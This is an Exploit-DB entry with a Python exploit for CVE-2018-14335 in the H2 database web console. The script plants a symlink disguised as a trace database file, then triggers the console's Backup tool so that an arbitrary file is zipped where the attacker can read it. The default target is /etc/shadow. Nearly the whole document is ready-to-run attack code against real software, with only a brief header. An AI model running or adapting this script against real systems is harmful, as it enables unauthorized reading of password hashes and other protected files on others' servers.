EDB-ID: 45105 | Author: owodelta | Published: 2018-07-30 | CVE: CVE-2018-14335 | Type: Webapps | Platform: Linux | Vulnerable App: N/A | # Date: 2018-07-16
# Exploit Author: owodelta
# Vendor Homepage: www.h2database.com
# Software Link: http://www.h2database.com/html/download.html
# Version: all versions
# Tested on: Linux
# CVE : CVE-2018-14335
# Description: Insecure handling of permissions in the backup function allows
# attackers to read sensitive files (outside of their permissions) via a
# symlink to a fake database file.
# PS, thanks to HTB and our team FallenAngels
#!/usr/bin/python
import requests
import argparse
import os
import random
def cleanup(wdir):
cmd = "rm {}symlink.trace.db".format(wdir)
os.system(cmd)
def create_symlink(file, wdir):
cmd = "ln -s {0} {1}symlink.trace.db".format(file,wdir)
os.system(cmd)
def trigger_symlink(host, wdir):
outputName = str(random.randint(1000,10000))+".zip"
#get cookie
url = 'http://{}'.format(host)
r = requests.get(url)
path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('login.jsp','tools.do')
url = '{}/{}'.format(url,path)
payload = {
"tool":"Backup",
"args":"-file,"+wdir+outputName+",-dir,"+wdir}
#print url
requests.post(url,data=payload).text
print "File is zipped in: "+wdir+outputName
if __name__ == "__main__":
parser = argparse.ArgumentParser()
required = parser.add_argument_group('required arguments')
required.add_argument("-H",
"--host",
metavar='127.0.0.1:8082',
help="Target host",
required=True)
required.add_argument("-D",
"--dir",
metavar="/tmp/",
default="/tmp/",
help="Writable directory")
required.add_argument("-F",
"--file",
metavar="/etc/shadow",
default="/etc/shadow",
help="Desired file to read",)
args = parser.parse_args()
create_symlink(args.file,args.dir)
trigger_symlink(args.host,args.dir)
cleanup(args.dir)